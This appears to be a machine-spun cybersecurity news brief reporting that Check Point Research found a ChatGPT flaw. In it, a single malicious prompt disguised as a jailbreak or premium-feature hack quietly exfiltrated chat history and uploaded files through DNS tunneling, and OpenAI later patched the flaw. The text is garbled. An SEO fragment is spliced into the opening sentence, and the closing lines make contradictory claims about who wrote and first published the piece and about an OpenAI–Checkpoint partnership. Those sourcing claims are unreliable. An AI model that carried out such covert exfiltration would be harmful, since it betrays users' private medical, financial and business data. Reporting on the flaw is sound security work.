People often give AI assistants very private information, like medical records, financial documents, and proprietary business code This article explores ai assistants vulnerable. . Checkpoint Research recently revealed a serious flaw in ChatGPT's architecture that let attackers quietly steal this exact kind of user data.
By using a hidden outbound channel, attackers could get chat history, uploaded files, and AI-generated outputs without users being notified or asked for permission. The attack doesn't need much user interaction and starts with just one bad prompt. a bad prompt that looks like a way to get premium features. Threat actors can spread these payloads on social media or public forums, pretending they are productivity hacks or jailbreaks.
OpenAI was able to fix the problem on February 20, 2026, which stopped the DNS tunneling flow.
But this event shows how AI assistants are becoming more vulnerable as they become more complex and multi-layered execution environments. Contact us to have your stories published. Follow us on LinkedIn and X for daily ZeroOwl.
Follow us on Twitter, Facebook, and LinkedIn to get daily updates on new software and security patches. You can also stay up to date on all things cybersecurity with our weekly Newsquiz. Back to the page you were on. Follow us on Facebook and Twitter by clicking here.
Back to the page where you came from. Check Point Research wrote the first article for OpenAI.
We are happy to say that OpenAI is a proud partner of Checkpoint and that ZDNet first published this article as part of our "Security in the Cloud" series. We want to be clear that we are not responsible for what any of our partner companies sell or offer.


%2520(1).webp&w=3840&q=75)








